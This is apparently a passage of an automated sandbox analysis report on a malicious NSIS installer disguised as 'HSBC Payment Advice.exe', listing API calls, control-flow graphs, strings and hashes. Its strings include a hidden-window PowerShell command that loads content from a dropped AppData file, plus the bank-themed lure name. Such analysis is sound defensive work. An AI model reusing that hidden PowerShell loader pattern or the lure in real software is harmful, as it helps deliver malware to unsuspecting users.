          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
          • GetDlgItem.USER32(?,00000003), ref: 00403EE3
          • ShowWindow.USER32(00000000,?), ref: 00403F04
          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
          • EnableWindow.USER32(?,?), ref: 00403F31
          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
          • EnableMenuItem.USER32(00000000), ref: 00403F4E
          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
          • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
          • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
          • ShowWindow.USER32(?,0000000A), ref: 004040EA
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
          • String ID:
          • API String ID: 3282139019-0
          • Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
          • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
          • Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
          • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E
          Function 00402DBA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 339 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 342 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 339->342 343 402e0a-402e0f 339->343 351 402f32-402f40 call 402d18 342->351 352 402e48-402e5f 342->352 344 403059-40305d 343->344 358 403011-403016 351->358 359 402f46-402f49 351->359 354 402e61 352->354 355 402e63-402e70 call 4032f7 352->355 354->355 361 402e76-402e7c 355->361 362 402fcd-402fd5 call 402d18 355->362 358->344 363 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 359->363 364 402f4b-402f63 call 40330d call 4032f7 359->364 365 402efc-402f00 361->365 366 402e7e-402e96 call 405b0f 361->366 362->358 389 402fc3-402fc8 363->389 390 402fd7-403007 call 40330d call 403060 363->390 364->358 391 402f69-402f6f 364->391 374 402f02-402f08 call 402d18 365->374 375 402f09-402f0f 365->375 366->375 384 402e98-402e9f 366->384 374->375 376 402f11-402f1f call 406300 375->376 377 402f22-402f2c 375->377 376->377 377->351 377->352 384->375 388 402ea1-402ea8 384->388 388->375 392 402eaa-402eb1 388->392 389->344 399 40300c-40300f 390->399 391->358 391->363 392->375 394 402eb3-402eba 392->394 394->375 396 402ebc-402edc 394->396 396->358 398 402ee2-402ee6 396->398 400 402ee8-402eec 398->400 401 402eee-402ef6 398->401 399->358 402 403018-403029 399->402 400->351 400->401 401->375 405 402ef8-402efa 401->405 403 403031-403036 402->403 404 40302b 402->404 406 403037-40303d 403->406 404->403 405->375 406->406 407 40303f-403057 call 405b0f 406->407 407->344
          APIs
          • GetTickCount.KERNEL32 ref: 00402DCE
          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
            • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
            • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
          Strings
          • Error launching installer, xrefs: 00402E0A
          • "C:\Users\user\Desktop\HSBC Payment Advice.exe", xrefs: 00402DC3
          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
          • soft, xrefs: 00402EAA
          • Null, xrefs: 00402EB3
          • Inst, xrefs: 00402EA1
          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
          • C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
          • String ID: "C:\Users\user\Desktop\HSBC Payment Advice.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
          • API String ID: 2803837635-3081919234
          • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
          • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
          • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
          • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
          Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 472 401752-401777 call 402b38 call 4059aa 477 401781-401793 call 405ee8 call 405933 lstrcatW 472->477 478 401779-40177f call 405ee8 472->478 483 401798-401799 call 40617c 477->483 478->483 487 40179e-4017a2 483->487 488 4017a4-4017ae call 40622b 487->488 489 4017d5-4017d8 487->489 496 4017c0-4017d2 488->496 497 4017b0-4017be CompareFileTime 488->497 490 4017e0-4017fc call 405b54 489->490 491 4017da-4017db call 405b2f 489->491 499 401870-401899 call 405192 call 403060 490->499 500 4017fe-401801 490->500 491->490 496->489 497->496 512 4018a1-4018ad SetFileTime 499->512 513 40189b-40189f 499->513 501 401852-40185c call 405192 500->501 502 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 500->502 514 401865-40186b 501->514 502->487 534 401847-401848 502->534 516 4018b3-4018be CloseHandle 512->516 513->512 513->516 517 4029ce 514->517 519 4018c4-4018c7 516->519 520 4029c5-4029c8 516->520 521 4029d0-4029d4 517->521 524 4018c9-4018da call 405f0a lstrcatW 519->524 525 4018dc-4018df call 405f0a 519->525 520->517 531 4018e4-402241 call 4056c4 524->531 525->531 531->520 531->521 534->514 536 40184a-40184b 534->536 536->501
          APIs
          • lstrcatW.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,?,?,00000031), ref: 00401793
          • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,00000000,00000000,"powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,?,?,00000031), ref: 004017B8
            • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
            • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
            • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92,00402D92,Completed,00000000,00000000,00000000), ref: 004051ED
            • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
          • String ID: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$truckled\Spaanskraberne198
          • API String ID: 1941528284-46577786
          • Opcode ID: ba9f977b933b7daf26b5bee7017ad8d3f61f37f96f31ec80bfe8d25e1f203dfd
          • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
          • Opcode Fuzzy Hash: ba9f977b933b7daf26b5bee7017ad8d3f61f37f96f31ec80bfe8d25e1f203dfd
          • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
          Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 538 405192-4051a7 539 4051ad-4051be 538->539 540 40525e-405262 538->540 541 4051c0-4051c4 call 405f0a 539->541 542 4051c9-4051d5 lstrlenW 539->542 541->542 544 4051f2-4051f6 542->544 545 4051d7-4051e7 lstrlenW 542->545 547 405205-405209 544->547 548 4051f8-4051ff SetWindowTextW 544->548 545->540 546 4051e9-4051ed lstrcatW 545->546 546->544 549 40520b-40524d SendMessageW * 3 547->549 550 40524f-405251 547->550 548->547 549->550 550->540 551 405253-405256 550->551 551->540
          APIs
          • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
          • lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
          • lstrcatW.KERNEL32(Completed,00402D92,00402D92,Completed,00000000,00000000,00000000), ref: 004051ED
          • SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$lstrlen$TextWindowlstrcat
          • String ID: Completed
          • API String ID: 2531174081-3087654605
          • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
          • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
          • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
          • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8
          Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 552 40317b-4031a4 GetTickCount 553 4032e5-4032ed call 402d18 552->553 554 4031aa-4031d5 call 40330d SetFilePointer 552->554 559 4032ef-4032f4 553->559 560 4031da-4031ec 554->560 561 4031f0-4031fe call 4032f7 560->561 562 4031ee 560->562 565 403204-403210 561->565 566 4032d7-4032da 561->566 562->561 567 403216-40321c 565->567 566->559 568 403247-403263 call 40638e 567->568 569 40321e-403224 567->569 574 4032e0 568->574 575 403265-40326d 568->575 569->568 570 403226-403246 call 402d18 569->570 570->568 579 4032e2-4032e3 574->579 577 4032a1-4032a7 575->577 578 40326f-403285 WriteFile 575->578 577->574 582 4032a9-4032ab 577->582 580 403287-40328b 578->580 581 4032dc-4032de 578->581 579->559 580->581 583 40328d-403299 580->583 581->579 582->574 584 4032ad-4032c0 582->584 583->567 585 40329f 583->585 584->560 586 4032c6-4032d5 SetFilePointer 584->586 585->584 586->553
          APIs
          • GetTickCount.KERNEL32 ref: 00403190
            • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
          • WriteFile.KERNELBASE(0040BE78,00412011,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
          • SetFilePointer.KERNELBASE(0023CDF4,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$Pointer$CountTickWrite
          • String ID: x>A
          • API String ID: 2146148272-3854404225
          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
          • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
          • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED
          Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 587 4015b9-4015cd call 402b38 call 4059de 592 401614-401617 587->592 593 4015cf-4015eb call 405960 CreateDirectoryW 587->593 594 401646-402195 call 401423 592->594 595 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 592->595 602 40160a-401612 593->602 603 4015ed-4015f8 GetLastError 593->603 608 4029c5-4029d4 594->608 595->608 610 40163e-401641 595->610 602->592 602->593 606 401607 603->606 607 4015fa-401605 GetFileAttributesW 603->607 606->602 607->602 607->606 610->608
          APIs
            • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,76702EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 004059EC
            • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
            • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,?,00000000,000000F0), ref: 00401630
          Strings
          • C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion, xrefs: 00401623
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
          • String ID: C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion
          • API String ID: 3751793516-1482619193
          • Opcode ID: b06b06725131e5471f0a94c6893011cfa6e633a44e63598bf1a8582287d2e863
          • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
          • Opcode Fuzzy Hash: b06b06725131e5471f0a94c6893011cfa6e633a44e63598bf1a8582287d2e863
          • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E
          Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 613 403060-40306e 614 403070-403086 SetFilePointer 613->614 615 40308c-403095 call 40317b 613->615 614->615 618 403175-403178 615->618 619 40309b-4030ae call 405bd7 615->619 622 403161 619->622 623 4030b4-4030c8 call 40317b 619->623 625 403163-403164 622->625 623->618 627 4030ce-4030d1 623->627 625->618 628 4030d3-4030d6 627->628 629 40313d-403143 627->629 632 403172 628->632 633 4030dc 628->633 630 403145 629->630 631 403148-40315f ReadFile 629->631 630->631 631->622 634 403166-40316f 631->634 632->618 635 4030e1-4030eb 633->635 634->632 636 4030f2-403104 call 405bd7 635->636 637 4030ed 635->637 636->622 640 403106-40311b WriteFile 636->640 637->636 641 403139-40313b 640->641 642 40311d-403120 640->642 641->625 642->641 643 403122-403135 642->643 643->635 644 403137 643->644 644->632
          APIs
          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
          • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$PointerWrite
          • String ID: x>A
          • API String ID: 539440098-3854404225
          • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
          • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
          • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
          • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9
          Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 645 405b83-405b8f 646 405b90-405bc4 GetTickCount GetTempFileNameW 645->646 647 405bd3-405bd5 646->647 648 405bc6-405bc8 646->648 650 405bcd-405bd0 647->650 648->646 649 405bca 648->649 649->650
          APIs
          • GetTickCount.KERNEL32 ref: 00405BA1
          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
